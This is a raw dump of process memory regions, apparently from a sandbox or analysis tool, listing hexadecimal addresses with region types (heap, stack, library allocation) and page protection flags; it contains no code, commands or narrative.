page read and write
9770000
heap
page read and write
1C80DD63000
heap
page read and write
CEB9000
unkown
page readonly
5F6000
heap
page read and write
7485000
unkown
page readonly
EE7C000
unkown
page read and write
6DE7000
stack
page read and write
7FFEBFDB0000
trusted library allocation
page read and write
7FF514B31000
unkown
page readonly
4DB0000
unkown
page read and write
6E1E000
unkown
page readonly
F8FB000
heap
page read and write
1DF7AE57000
heap
page execute and read and write
D1FB000
unkown
page read and write
4798000
heap
page read and write
A292000
unkown
page readonly
9690000
unkown
page read and write
488F000
heap
page read and write
4050000
trusted library section
page read and write
4140000
unkown
page read and write
CD63000
unkown
page readonly
C5DE000
unkown
page readonly
715D000
unkown
page readonly
7FF51482C000
unkown
page readonly
6740000
trusted library allocation
page read and write
1D7857F0000
heap
page read and write
7B76000
heap
page read and write
A253000
unkown
page readonly
F7BB000
heap
page read and write
1DF7B370000
trusted library allocation
page read and write
52F0000
unkown
page read and write
772E000
unkown
page read and write
7C1E000
heap
page read and write
9F38000
unkown
page readonly
4871000
unkown
page read and write
7FF514A3C000
unkown
page readonly
5318000
unkown
page read and write
7AD4000
heap
page read and write
62E0000
trusted library allocation
page read and write
7DC6000
heap
page read and write
E74A000
unkown
page read and write
CC7C000
unkown
page read and write
DAEC000
stack
page read and write
1F19BC01000
trusted library allocation
page read and write
72FF000
unkown
page readonly
9E97000
unkown
page readonly
218C8253000
heap
page read and write
7BDB000
heap
page read and write
7E3C000
heap
page read and write
181CCFE0000
trusted library allocation
page read and write
58AC000
stack
page read and write
7B5B000
heap
page read and write
946C000
stack
page read and write
C6BE000
unkown
page readonly
7DEE000
heap
page read and write
642E000
stack
page read and write
3304000
heap
page read and write
7FF514A69000
unkown
page readonly
7FFEBFD60000
trusted library allocation
page read and write
10B1E000
heap
page read and write
16ABD2F2000
trusted library allocation
page read and write
4944000
unkown
page read and write
7FF514AAA000
unkown
page readonly
C0EF000
stack
page read and write
7CBB000
heap
page read and write
7FFEBFC86000
trusted library allocation
page read and write
57D0000
unkown
page readonly
1FD1CC18000
trusted library allocation
page read and write
4030000
trusted library allocation
page execute and read and write
C0AB000
stack
page read and write
1DF7B120000
trusted library allocation
page read and write
1DF7B130000
trusted library allocation
page read and write
FC50000
heap
page read and write
775000
heap
page read and write
A267000
unkown
page readonly
4249000
heap
page read and write
8240000
unkown
page read and write
7B57000
heap
page read and write
775000
heap
page read and write
44C0000
heap
page read and write
97C2000
heap
page read and write
7C34000
heap
page read and write
7898000
unkown
page read and write
7E22000
heap
page read and write
7B5B000
heap
page read and write
1D24B7F000
stack
page read and write
223E7D24000
heap
page read and write
7D62000
heap
page read and write
7BDE000
heap
page read and write
7DC1000
heap
page read and write
7DD8000
heap
page read and write
8DF000
heap
page read and write
7FF51481F000
unkown
page readonly
1FD1C2E7000
trusted library allocation
page read and write
7A6B000
stack
page read and write
16AD4020000
trusted library allocation
page read and write
5E37A79000
stack
page read and write
7A1E000
heap
page read and write
FA68000
heap
page read and write
7FFEBFD90000
trusted library allocation
page read and write
7B1A000
heap
page read and write
F8F5000
heap
page read and write
E77A000
unkown
page read and write
C22A000
stack
page read and write
7FF514B5E000
unkown
page readonly
910A000
unkown
page read and write
6D20000
heap
page read and write
22E1B502000
trusted library allocation
page read and write
250000
unkown
page read and write
8168000
unkown
page read and write
74EC000
unkown
page readonly
DB56000
unkown
page read and write
2870000
trusted library allocation
page read and write
7FFF2E2BE000
unkown
page read and write
7B0A000
heap
page read and write
4040000
trusted library section
page read and write
81EC000
stack
page read and write
181CD430000
trusted library allocation
page read and write
4110000
unkown
page read and write
7D99000
heap
page read and write
1DF0006A000
trusted library allocation
page read and write
F631000
heap
page read and write
1D785656000
heap
page read and write
3EF0000
unkown
page read and write
520000
heap
page read and write
107C9000
heap
page read and write
7B16000
heap
page read and write
7F1F000
stack
page read and write
56B000
heap
page read and write
6710000
trusted library allocation
page read and write
7C7D000
heap
page read and write
D88000
heap
page read and write
FD07000
heap
page read and write
1F1A0A0F000
heap
page read and write
970000
unkown
page readonly
7FF514655000
unkown
page readonly
2AEC000
heap
page read and write
1E9DDC02000
heap
page read and write
7B44000
heap
page read and write
B1E8000
stack
page read and write
6A20000
trusted library allocation
page read and write
1D785656000
heap
page read and write
9A92000
unkown
page readonly
6149000
unkown
page read and write
940E000
unkown
page read and write
181CD4E0000
trusted library allocation
page read and write
9797000
unkown
page read and write
E765000
unkown
page read and write
29D0000
trusted library allocation
page read and write
7B16000
heap
page read and write
9DA000
stack
page read and write
83E9000
stack
page read and write
7FF51486B000
unkown
page readonly
1FD1C4D7000
trusted library allocation
page read and write
7FFEBFC90000
trusted library allocation
page execute and read and write
7CFE000
heap
page read and write
531E000
stack
page read and write
223E7BFB000
heap
page read and write
181CCBE1000
heap
page read and write
223E992E000
heap
page read and write
7FF51484D000
unkown
page readonly
1F1A0A62000
heap
page read and write
4720000
unkown
page read and write
116ED000
stack
page read and write
7B63000
heap
page read and write
6AC5000
heap
page read and write
1DF7AE10000
heap
page read and write
7E51000
heap
page read and write
F8E1000
heap
page read and write
C6C0000
unkown
page readonly
F90F000
heap
page read and write
CBF9000
unkown
page read and write
7FF514C01000
unkown
page readonly
7CD4000
heap
page read and write
4280000
trusted library section
page read and write
D8C6A7E000
stack
page read and write
28B0000
unkown
page read and write
223E9887000
heap
page read and write
4434000
heap
page read and write
84440FB000
stack
page read and write
8A0E000
unkown
page read and write
2809000
unkown
page read and write
931000
heap
page read and write
7FF5144E3000
unkown
page readonly
7DC8000
heap
page read and write
7B4B000
heap
page read and write
7FF514BA7000
unkown
page readonly
7F7C000
unkown
page read and write
23A84E4C000
trusted library allocation
page read and write
4110000
unkown
page read and write
7FF514706000
unkown
page readonly
4C2E000
stack
page read and write
4437000
heap
page read and write
7FF514B2B000
unkown
page readonly
97F6000
heap
page read and write
74AE000
unkown
page readonly
218C8200000
heap
page read and write
8F4000
heap
page read and write
922000
heap
page read and write
6B14000
heap
page read and write
97BC000
heap
page read and write
9A5B000
unkown
page read and write
7D77000
heap
page read and write
68B7CBE000
stack
page read and write
181CD4C0000
trusted library allocation
page read and write
1E9DCEAB000
heap
page read and write
630000
unkown
page readonly
7C95000
heap
page read and write
7B52000
heap
page read and write
6CA0000
trusted library allocation
page read and write
7D99000
heap
page read and write
7FFF2E3A3000
unkown
page read and write
2831000
heap
page read and write
7B81000
heap
page read and write
97BE000
heap
page read and write
C87F000
unkown
page read and write
7DF0000
heap
page read and write
CBF9000
unkown
page read and write
16ABC9C2000
trusted library allocation
page read and write
7E34000
heap
page read and write
7FFEBFD60000
trusted library allocation
page read and write
7FFF2E3B0000
unkown
page read and write
4798000
heap
page read and write
7B91000
heap
page read and write
6CE0000
trusted library allocation
page read and write
F8F9000
heap
page read and write
D80000
trusted library allocation
page read and write
CEC2000
unkown
page readonly
C6BE000
unkown
page readonly
768C000
unkown
page read and write
16AD3E3D000
heap
page read and write
97A8000
heap
page read and write
16ABBBBF000
heap
page read and write
1E9DCF08000
heap
page read and write
20A41BDC000
heap
page read and write
43FB000
heap
page read and write
1FD1B010000
trusted library allocation
page read and write
FAE5000
heap
page read and write
71B0000
trusted library allocation
page read and write
1DF7AF1F000
heap
page read and write
3470000
heap
page read and write
3470000
heap
page read and write
7DD1000
heap
page read and write
3280000
trusted library allocation
page read and write
F585000
heap
page read and write
95164F9000
stack
page read and write
181B5ED3000
trusted library allocation
page read and write
ACE9000
stack
page read and write
181CD4B0000
trusted library allocation
page read and write
97F6000
heap
page read and write
223E989C000
heap
page read and write
3470000
heap
page read and write
7FF5144EC000
unkown
page readonly
7DF45F4E0000
trusted library allocation
page execute and read and write
1FD1B000000
trusted library allocation
page read and write
7D30000
heap
page read and write
F903000
heap
page read and write
7B91000
heap
page read and write
A6EA000
stack
page read and write
D290000
heap
page read and write
284D000
heap
page read and write
57C0000
trusted library allocation
page read and write
A11E000
unkown
page readonly
23A82DB6000
heap
page read and write
7D99000
heap
page read and write
277D000
heap
page read and write
6CB3000
trusted library allocation
page read and write
27B7000
unkown
page read and write
E765000
unkown
page read and write
4194000
heap
page read and write
2B29000
stack
page read and write
57B2000
system
page read and write
F8FF000
heap
page read and write
7B0D000
heap
page read and write
1C80DDE4000
heap
page read and write
AAEB000
stack
page read and write
7DE4000
heap
page read and write
7FF514C29000
unkown
page readonly
F66B000
heap
page read and write
284A000
stack
page read and write
7A94000
heap
page read and write
7E4A000
heap
page read and write
B96F000
stack
page read and write
97B2000
heap
page read and write
4121000
unkown
page read and write
7DD4000
heap
page read and write
284E000
heap
page read and write
900000
unkown
page readonly
7C69000
stack
page read and write
1FD1C1E9000
trusted library allocation
page read and write
482E000
heap
page read and write
7CA2000
heap
page read and write
CAB000
heap
page read and write
FA73000
heap
page read and write
820000
heap
page read and write
7DF0000
heap
page read and write
24204D13000
heap
page read and write
7B52000
heap
page read and write
7F8B000
unkown
page read and write
7CDA000
heap
page read and write
7B43000
heap
page read and write
16ABD194000
trusted library allocation
page read and write
2AF9000
heap
page read and write
F8D5000
heap
page read and write
7DF4460E0000
trusted library allocation
page readonly
10903000
heap
page read and write
7FFF2E3B3000
unkown
page readonly
7C21000
heap
page read and write
7FFEBFD00000
trusted library allocation
page read and write
7FF51473F000
unkown
page readonly
6A2C000
stack
page read and write
6153000
unkown
page read and write
7FFF295EC000
unkown
page read and write
7B4B000
heap
page read and write
2B4C000
heap
page read and write
75F9000
unkown
page readonly
7E65000
heap
page read and write
75E3000
unkown
page readonly
E6E1000
unkown
page read and write
7FF5144F5000
unkown
page readonly
A76E000
stack
page read and write
223E98A4000
heap
page read and write
7BDB000
heap
page read and write
768A000
unkown
page read and write
60FE000
unkown
page read and write
2836000
unkown
page read and write
7E52000
heap
page read and write
8A0000
heap
page read and write
7E0A000
heap
page read and write
7DE2000
heap
page read and write
240000
heap
page read and write
2340000
unkown
page read and write
23A9CF00000
trusted library allocation
page read and write
7DF446131000
trusted library allocation
page execute read
7DDE000
heap
page read and write
20A3F710000
heap
page read and write
7D2A000
heap
page read and write
5E37B7E000
stack
page read and write
7F74000
unkown
page read and write
23A8501A000
trusted library allocation
page read and write
20F8C23C000
heap
page read and write
9E0000
unkown
page readonly
181CCC80000
trusted library allocation
page read and write
7605000
unkown
page readonly
7DF0000
heap
page read and write
F706000
heap
page read and write
E748000
unkown
page read and write
F3FB000
unkown
page read and write
D8C6FFF000
stack
page read and write
F636000
heap
page read and write
181CCFF0000
trusted library allocation
page read and write
4821000
heap
page read and write
57C0000
unkown
page read and write
23A9CCF4000
heap
page read and write
3304000
heap
page read and write
F7CC000
heap
page read and write
1D24CFE000
stack
page read and write
F659000
heap
page read and write
6B79000
heap
page read and write
1F1A0B02000
heap
page read and write
B9EB000
stack
page read and write
9265000
stack
page read and write
1D7857B0000
trusted library allocation
page read and write
8DF000
heap
page read and write
1E9DDC03000
heap
page read and write
1DF7AF4F000
heap
page read and write
846C000
stack
page read and write
6B14000
heap
page read and write
2877000
heap
page read and write
7FFEBFB4C000
trusted library allocation
page execute and read and write
7FFEBFAAC000
trusted library allocation
page read and write
1DF7B140000
trusted library allocation
page read and write
7FF514B81000
unkown
page readonly
223E7C14000
heap
page read and write
7D64000
heap
page read and write
D0FB000
unkown
page read and write
775000
heap
page read and write
7FFF29539000
unkown
page readonly
7B63000
heap
page read and write
8433000
unkown
page read and write
7FF514BDF000
unkown
page readonly
16AB9B30000
unkown
page read and write
F7FA000
heap
page read and write
29E7000
system
page read and write
7D5B000
heap
page read and write
CCFC000
unkown
page readonly
4449000
heap
page read and write
7C27000
heap
page read and write
181CCBA1000
heap
page read and write
7FFEBFBB0000
trusted library allocation
page execute and read and write
23A82C60000
heap
page read and write
4680000
unkown
page readonly
2BB9000
stack
page read and write
698B000
stack
page read and write
3476000
heap
page read and write
7CC8000
heap
page read and write
223E9949000
heap
page read and write
2878000
heap
page read and write
F27B000
unkown
page read and write
7FFEBFC4D000
trusted library allocation
page read and write
3304000
heap
page read and write
7B16000
heap
page read and write
1FD2B5D4000
trusted library allocation
page read and write
81D000
heap
page read and write
181B49F4000
trusted library allocation
page read and write
550000
heap
page read and write
7FFF2964F000
unkown
page readonly
4D0E000
stack
page read and write
20F8C1E0000
trusted library allocation
page read and write
446E000
heap
page read and write
1FD19310000
heap
page read and write
951714E000
stack
page read and write
481C000
heap
page read and write
7DD4000
heap
page read and write
4121000
heap
page read and write
2B20000
unkown
page read and write
5FA000
heap
page read and write
6AE0000
heap
page read and write
92ED000
stack
page read and write
7A53000
heap
page read and write
D7EB000
stack
page read and write
1FD1C4BE000
trusted library allocation
page read and write
7E7F000
heap
page read and write
2990000
unkown
page readonly
47B3000
heap
page read and write
43E0000
heap
page read and write
7E3A000
heap
page read and write
6149000
unkown
page read and write
2100000
heap
page read and write
7DDB000
heap
page read and write
44BC000
heap
page read and write
441C000
stack
page read and write
CCFC000
unkown
page readonly
2403000
heap
page read and write
284A000
stack
page read and write
820C000
stack
page read and write
C684000
unkown
page readonly
181CD3F0000
trusted library allocation
page read and write
23E0000
unkown
page readonly
10BCF000
heap
page read and write
181CD530000
trusted library allocation
page read and write
82B9000
unkown
page read and write
8443977000
stack
page read and write
422B000
heap
page read and write
890000
heap
page read and write
A43E000
stack
page read and write
23A9CDC4000
trusted library allocation
page read and write
F903000
heap
page read and write
97A8000
heap
page read and write
4FC000
stack
page read and write
7FF514CA3000
unkown
page readonly
181CCFA0000
trusted library allocation
page read and write
FC70000
heap
page read and write
E200000
unkown
page read and write
2873000
trusted library allocation
page read and write
4D30000
unkown
page readonly
7FF514A4E000
unkown
page readonly
22E1B1E0000
heap
page read and write
95171CE000
stack
page read and write
6A40000
trusted library allocation
page read and write
822E000
unkown
page read and write
80FC000
unkown
page read and write
223E9956000
heap
page read and write
27ED000
unkown
page read and write
7D77000
heap
page read and write
7EE000
stack
page read and write
5AD000
heap
page read and write
2340000
unkown
page read and write
23A849C0000
trusted library allocation
page read and write
62AD000
unkown
page read and write
F7C4000
heap
page read and write
7B6A000
heap
page read and write
1FD1CC2D000
trusted library allocation
page read and write
5D0000
heap
page read and write
4C8E000
stack
page read and write
193F2A8A000
heap
page read and write
7FFEBFC72000
trusted library allocation
page read and write
770000
heap
page read and write
43C8000
stack
page read and write
A96C000
stack
page read and write
29D8000
stack
page read and write
CB1000
heap
page read and write
7F78000
unkown
page read and write
7FF514BBD000
unkown
page readonly
C905000
unkown
page readonly
181B2C12000
heap
page read and write
3F00000
unkown
page write copy
3304000
heap
page read and write
7FF514B81000
unkown
page readonly
156BEBF0000
heap
page read and write
FCF0000
heap
page read and write
6B79000
heap
page read and write
7FF51464E000
unkown
page readonly
847000
heap
page read and write
3304000
heap
page read and write
7DEC000
heap
page read and write
5E8C000
stack
page read and write
6AA8000
heap
page read and write
57E0000
unkown
page readonly
1F19B092000
heap
page read and write
7FFEBFD80000
trusted library allocation
page read and write
1E9DD777000
heap
page read and write
7FF5144E8000
unkown
page readonly
20F8C24E000
heap
page read and write
7FFF2E2C0000
unkown
page read and write
1E9DCE29000
heap
page read and write
7DD1000
heap
page read and write
7FF514434000
unkown
page readonly
1028C000
stack
page read and write
16ABBCAA000
trusted library allocation
page read and write
7C17000
heap
page read and write
527BFE000
stack
page read and write
7FF514645000
unkown
page readonly
480000
heap
page read and write
75F9000
unkown
page readonly
7E0E000
heap
page read and write
7B0A000
heap
page read and write
4827000
heap
page read and write
4918000
heap
page read and write
D08B000
stack
page read and write
750000
unkown
page read and write
16AB9C89000
heap
page read and write
23A84A01000
trusted library allocation
page read and write
E74A000
unkown
page read and write
7DBC000
heap
page read and write
10B8F000
heap
page read and write
920F000
unkown
page read and write
7622000
unkown
page readonly
2825000
heap
page read and write
76A9000
unkown
page read and write
1D785671000
heap
page read and write
1C80BED5000
heap
page read and write
1196C000
stack
page read and write
7FF514742000
unkown
page readonly
481C000
heap
page read and write
7FF5144F5000
unkown
page readonly
7FFEBFDB0000
trusted library allocation
page read and write
7DC8000
heap
page read and write
B3EF000
stack
page read and write
7FFEBFC3C000
trusted library allocation
page read and write
9E0000
unkown
page readonly
94EB000
stack
page read and write
7FF514687000
unkown
page readonly
F886000
heap
page read and write
88AB1FE000
stack
page read and write
AD6A000
stack
page read and write
7FF514512000
unkown
page readonly
29C9000
stack
page read and write
7E28000
heap
page read and write
7C0D000
heap
page read and write
B8E000
stack
page read and write
7D34000
heap
page read and write
76B8000
unkown
page read and write
7FF514A60000
unkown
page readonly
5283FB000
stack
page read and write
7B6000
heap
page read and write
1E9DD792000
heap
page read and write
7FF514AA6000
unkown
page readonly
1E9DCD00000
heap
page read and write
7FF5146A4000
unkown
page readonly
4140000
unkown
page read and write
4D26000
stack
page read and write
1C80D770000
heap
page read and write
7622000
unkown
page readonly
7FFEBFC31000
trusted library allocation
page read and write
436A000
unclassified section
page read and write
6690000
trusted library allocation
page read and write
EF7B000
unkown
page read and write
7FFEBFD70000
trusted library allocation
page read and write
6B14000
heap
page read and write
6A9E000
heap
page read and write
7F89000
unkown
page read and write
7DF4174C0000
trusted library allocation
page execute and read and write
880B000
unkown
page read and write
4110000
unkown
page read and write
7B5B000
heap
page read and write
1E9DD771000
heap
page read and write
7FFF2E209000
unkown
page readonly
F905000
heap
page read and write
7D64000
heap
page read and write
44FA000
stack
page read and write
1F1A0790000
trusted library allocation
page read and write
7DCB000
heap
page read and write
7FFEBFB40000
trusted library allocation
page read and write
630000
unkown
page readonly
7FFEBFCB0000
trusted library allocation
page read and write
482E000
heap
page read and write
6780000
trusted library allocation
page read and write
16AD40D0000
heap
page read and write
850000
trusted library allocation
page read and write
75DC000
unkown
page readonly
7DD1000
heap
page read and write
7868000
stack
page read and write
F8E7000
heap
page read and write
EBF4D19000
stack
page read and write
898D000
unkown
page read and write
7CCD000
heap
page read and write
10B15000
heap
page read and write
1166D000
stack
page read and write
7392000
unkown
page readonly
7E14000
heap
page read and write
2C30000
unkown
page read and write
6EC0000
trusted library allocation
page read and write
7DC1000
heap
page read and write
7FFF2964F000
unkown
page readonly
242049F0000
heap
page read and write
7FF514AD4000
unkown
page readonly
7CDA000
heap
page read and write
A269000
unkown
page readonly
7FFEBFDA0000
trusted library allocation
page read and write
7C53000
heap
page read and write
16ABD307000
trusted library allocation
page read and write
7C2A000
heap
page read and write
A06A000
unkown
page readonly
16ABBBF7000
heap
page read and write
7B4F000
heap
page read and write
75CA000
unkown
page read and write
20F8C300000
heap
page read and write
7FF51471A000
unkown
page readonly
9DCD000
unkown
page readonly
242049E0000
heap
page read and write
763BC37000
stack
page read and write
3ED0000
unkown
page read and write
E297000
unkown
page read and write
2589000
stack
page read and write
6CD0000
trusted library allocation
page read and write
AB1CAFE000
stack
page read and write
F57E000
heap
page read and write
27ED000
unkown
page read and write
8433000
unkown
page read and write
4918000
heap
page read and write
1E9DD796000
heap
page read and write
10938000
heap
page read and write
223E7C04000
heap
page read and write
7FF5144EF000
unkown
page readonly
7B76000
heap
page read and write
6C0000
unkown
page readonly
CE45000
unkown
page readonly
7C27000
heap
page read and write
77EA000
stack
page read and write
6AD8000
heap
page read and write
6F8C000
stack
page read and write
7FFEBFE20000
trusted library allocation
page read and write
7FF51485C000
unkown
page readonly
223EB3D0000
heap
page read and write
F8D7000
heap
page read and write
16AD3DF0000
trusted library allocation
page read and write
48A6000
heap
page read and write
8C8C000
unkown
page read and write
473F000
heap
page read and write
7FF5146E9000
unkown
page readonly
1D24E79000
stack
page read and write
2760000
heap
page read and write
715D000
unkown
page readonly
6EC0000
trusted library allocation
page read and write
7C2F000
heap
page read and write
240000
heap
page read and write
29E7000
system
page read and write
48F6000
heap
page read and write
7FFF295EC000
unkown
page read and write
41FA000
heap
page read and write
48A6000
heap
page read and write
4131000
heap
page read and write
7C15000
heap
page read and write
7D62000
heap
page read and write
223E7D99000
heap
page read and write
223E995E000
heap
page read and write
7FF514980000
unkown
page readonly
7FF514C12000
unkown
page readonly
AB1CFFE000
stack
page read and write
7FFF2E2B3000
unkown
page read and write
181CCC20000
heap
page execute and read and write
E0D5000
unkown
page read and write
870000
unkown
page readonly
68B7D3E000
stack
page read and write
7B0E000
heap
page read and write
F648000
heap
page read and write
708D000
stack
page read and write
97C4000
heap
page read and write
181B5EA7000
trusted library allocation
page read and write
81EC000
stack
page read and write
9F67000
unkown
page readonly
7687000
unkown
page read and write
7C98000
heap
page read and write
16ABC993000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
278E000
stack
page read and write
1DF7B360000
trusted library allocation
page read and write
7FF5147FD000
unkown
page readonly
6AF2000
heap
page read and write
826E000
stack
page read and write
2700000
system
page execute and read and write
20A3F931000
heap
page read and write
550000
heap
page read and write
8C8C000
unkown
page read and write
1E9DD799000
heap
page read and write
2814000
heap
page read and write
2778000
system
page execute and read and write
FAF8000
heap
page read and write
A0F5000
unkown
page readonly
6A70000
trusted library allocation
page read and write
7FFEBFD10000
trusted library allocation
page read and write
181CD460000
trusted library allocation
page read and write
7DE4000
heap
page read and write
2772000
heap
page read and write
16AB9C5A000
heap
page read and write
7B6A000
heap
page read and write
720000
unkown
page readonly
193F28E0000
heap
page read and write
3FDA000
stack
page read and write
F382000
heap
page read and write
7D72000
heap
page read and write
156BEBE5000
heap
page read and write
302000
unkown
page read and write
84445FF000
stack
page read and write
7B1A000
heap
page read and write
7C32000
heap
page read and write
7FFEBFB50000
trusted library allocation
page read and write
76FF000
unkown
page read and write
938E000
unkown
page read and write
7DFC000
heap
page read and write
2878000
heap
page read and write
C7AE000
unkown
page readonly
48A6000
heap
page read and write
75D2000
unkown
page read and write
7553000
unkown
page readonly
7C36000
heap
page read and write
7F7000
heap
page read and write
97C0000
heap
page read and write
7D5B000
heap
page read and write
A1EC000
unkown
page readonly
7D4C000
heap
page read and write
27D2000
unkown
page read and write
F907000
heap
page read and write
7FFEBFE10000
trusted library allocation
page read and write
181B4EE6000
trusted library allocation
page read and write
472A000
heap
page read and write
1DF7AF4F000
heap
page read and write
9515D05000
stack
page read and write
7FF5146A0000
unkown
page readonly
9F7F000
unkown
page readonly
768A000
unkown
page read and write
7ABC000
heap
page read and write
48C5000
unkown
page read and write
1E9DD75E000
heap
page read and write
223E9965000
heap
page read and write
1D785400000
heap
page read and write
7B57000
heap
page read and write
7FF514509000
unkown
page readonly
7DC1000
heap
page read and write
7D30000
heap
page read and write
542E000
stack
page read and write
760C000
unkown
page readonly
769C000
unkown
page read and write
6A2C000
stack
page read and write
8246000
unkown
page read and write
3FE0000
unkown
page read and write
5367000
unkown
page read and write
6AA0000
heap
page read and write
7F9D000
unkown
page read and write
6ED0000
trusted library allocation
page read and write
7785000
stack
page read and write
4918000
heap
page read and write
3B77000
heap
page read and write
CAB000
heap
page read and write
2989000
stack
page read and write
850000
unkown
page read and write
9845000
heap
page read and write
1C80DDE4000
heap
page read and write
1E9DD792000
heap
page read and write
5D0000
heap
page read and write
181B2C91000
heap
page read and write
7FF5144D4000
unkown
page readonly
E726000
unkown
page read and write
720000
unkown
page readonly
30000
unkown
page read and write
6E33000
unkown
page readonly
C60F000
unkown
page readonly
7DF8000
heap
page read and write
7AD0000
heap
page read and write
CE7C000
unkown
page readonly
22E1B1F0000
trusted library allocation
page read and write
4777000
heap
page read and write
7E02000
heap
page read and write
441C000
heap
page read and write
75F7000
unkown
page readonly
1186D000
stack
page read and write
1E9DCE13000
heap
page read and write
7FF514B55000
unkown
page readonly
7FFEBFCB5000
trusted library allocation
page read and write
7FF51482C000
unkown
page readonly
23A9CD10000
heap
page execute and read and write
B8E474B000
stack
page read and write
7FF514486000
unkown
page readonly
10883000
heap
page read and write
6AC5000
heap
page read and write
424E000
stack
page read and write
71F0000
trusted library allocation
page read and write
6C93000
heap
page readonly
23A9CEF1000
trusted library allocation
page read and write
640000
unkown
page readonly
1F1A0890000
trusted library allocation
page read and write
2AB5000
stack
page read and write
7C17000
heap
page read and write
F703000
heap
page read and write
7FF51483F000
unkown
page readonly
109DB000
heap
page read and write
48D6000
heap
page read and write
223E7AB0000
heap
page read and write
1DF7B360000
trusted library allocation
page read and write
728B000
stack
page read and write
16ABBBD1000
heap
page read and write
A96C000
stack
page read and write
7B5B000
heap
page read and write
FCF4000
heap
page read and write
FA48000
heap
page read and write
AAEB000
stack
page read and write
698C000
stack
page read and write
7DF8000
heap
page read and write
60FE000
unkown
page read and write
44D6000
heap
page read and write
79EE000
stack
page read and write
C660000
unkown
page read and write
81A3000
unkown
page read and write
F8D7000
heap
page read and write
A15C000
unkown
page readonly
20A3F953000
heap
page read and write
1FD194DA000
heap
page read and write
1DF7AEB0000
heap
page read and write
43B76FE000
stack
page read and write
1C80DF69000
heap
page read and write
44C2000
heap
page read and write
7D4C000
heap
page read and write
796E000
stack
page read and write
951730F000
stack
page read and write
1FD1AEF0000
heap
page execute and read and write
7C60000
heap
page read and write
AB3587E000
stack
page read and write
6AAA000
heap
page read and write
A5EE000
stack
page read and write
2B7C000
heap
page read and write
1DF7B120000
trusted library allocation
page read and write
4290000
unkown
page read and write
7B91000
heap
page read and write
A215000
unkown
page readonly
7DF6000
heap
page read and write
3304000
heap
page read and write
283C000
heap
page read and write
7FF514A70000
unkown
page readonly
2100000
heap
page read and write
7C95000
heap
page read and write
223E9946000
heap
page read and write
8780000
stack
page readonly
46CA000
system
page read and write
4010000
trusted library section
page read and write
41BF000
heap
page read and write
B9EB000
stack
page read and write
CD7C000
unkown
page read and write
74AE000
unkown
page readonly
1DF7AF95000
heap
page read and write
6AA3000
heap
page read and write
CDF3000
unkown
page readonly
F8E1000
heap
page read and write
181CD3E0000
trusted library allocation
page read and write
1DF10065000
trusted library allocation
page read and write
7B16000
heap
page read and write
48F6000
heap
page read and write
4100000
unkown
page read and write
F8DF000
heap
page read and write
7DC6000
heap
page read and write
4871000
unkown
page read and write
4199000
heap
page read and write
7FF5147BD000
unkown
page readonly
820000
heap
page read and write
7D15000
heap
page read and write
7DF8000
heap
page read and write
3EB0000
trusted library section
page read and write
1FD1B000000
trusted library allocation
page read and write
7FF514923000
unkown
page readonly
F40F000
stack
page read and write
7FFF29451000
unkown
page execute read
3EF3000
unkown
page read and write
7C2F000
heap
page read and write
7FFEBFDC0000
trusted library allocation
page read and write
4918000
heap
page read and write
1D7855E0000
trusted library allocation
page read and write
7E5C000
heap
page read and write
596000
stack
page read and write
537A000
unkown
page read and write
1F19B08D000
heap
page read and write
7B6A000
heap
page read and write
48C7000
system
page read and write
7C74000
heap
page read and write
5341000
unkown
page read and write
7B0E000
heap
page read and write
7AFB000
heap
page read and write
7FF5147B1000
unkown
page readonly
92B000
heap
page read and write
60FE000
unkown
page read and write
DB4D000
unkown
page read and write
4DA8000
unkown
page read and write
7C19000
heap
page read and write
2B9F000
trusted library allocation
page execute and read and write
6EF0000
trusted library allocation
page read and write
181CD3E0000
trusted library allocation
page read and write
7FFEBFB50000
trusted library allocation
page execute and read and write
4452000
heap
page read and write
7D72000
heap
page read and write
7FF51464E000
unkown
page readonly
1FD194D2000
heap
page read and write
1DF014BF000
trusted library allocation
page read and write
930000
heap
page read and write
7FF514B74000
unkown
page readonly
7FF51464B000
unkown
page readonly
4203000
heap
page read and write
1DF01482000
trusted library allocation
page read and write
7806000
stack
page read and write
DB6D000
stack
page read and write
7FF514B93000
unkown
page readonly
7FF514512000
unkown
page readonly
6AD5000
heap
page read and write
C8F0000
unkown
page readonly
768D000
stack
page read and write
F869000
heap
page read and write
7C11000
heap
page read and write
7DF2000
heap
page read and write
1D785410000
trusted library allocation
page read and write
96EF000
stack
page read and write
7FFEBFCD0000
trusted library allocation
page read and write
72E5000
unkown
page readonly
7B4B000
heap
page read and write
5D9000
heap
page read and write
7FF514CAB000
unkown
page readonly
3E97000
trusted library allocation
page read and write
44DC000
heap
page read and write
7FFF2E3A3000
unkown
page read and write
8755000
stack
page read and write
7C36000
heap
page read and write
57E0000
unkown
page readonly
4710000
unkown
page read and write
1C80E0EE000
heap
page read and write
7DC6000
heap
page read and write
6CE3000
trusted library allocation
page read and write
6AA6000
heap
page read and write
1DF01493000
trusted library allocation
page read and write
7FFEBFCD5000
trusted library allocation
page read and write
1DF00B64000
trusted library allocation
page read and write
7FF514806000
unkown
page readonly
7DF446131000
trusted library allocation
page execute read
6A9E000
heap
page read and write
4BB0000
trusted library allocation
page read and write
520000
heap
page read and write
A23E000
unkown
page readonly
72C8000
unkown
page readonly
181B2BB0000
heap
page read and write
6AF9000
heap
page read and write
6A90000
heap
page read and write
1E9DD796000
heap
page read and write
AA0000
heap
page read and write
FAEE000
heap
page read and write
23A84B11000
trusted library allocation
page read and write
223E7C08000
heap
page read and write
1FD1AF14000
trusted library allocation
page read and write
6B78000
heap
page read and write
7189000
stack
page read and write
96EF000
stack
page read and write
2DDC000
stack
page read and write
FBCE000
heap
page read and write
6D20000
trusted library allocation
page read and write
16ABBBD1000
heap
page read and write
1DF7A8D0000
heap
page read and write
22E1B350000
trusted library allocation
page read and write
6EF0000
trusted library allocation
page read and write
7FF51467D000
unkown
page readonly
4D26000
stack
page read and write
790000
stack
page read and write
8E8D000
unkown
page read and write
7FFEBFC4C000
trusted library allocation
page read and write
3E0000
heap
page read and write
7E5F000
heap
page read and write
7DF4000
heap
page read and write
7FF51440E000
unkown
page readonly
1093E000
heap
page read and write
DB4D000
unkown
page read and write
7E3C000
heap
page read and write
AB357FE000
stack
page read and write
480000
heap
page read and write
DB4B000
unkown
page read and write
DC7000
heap
page read and write
4280000
unkown
page readonly
76A1000
unkown
page read and write
20F8C24A000
heap
page read and write
8433000
unkown
page read and write
7FFEBFC54000
trusted library allocation
page read and write
223E7C15000
heap
page read and write
DB4B000
unkown
page read and write
7FF5148F8000
unkown
page readonly
7C13000
heap
page read and write
44C0000
heap
page read and write
EFE000
stack
page read and write
7D5A000
heap
page read and write
7FFEBFCE0000
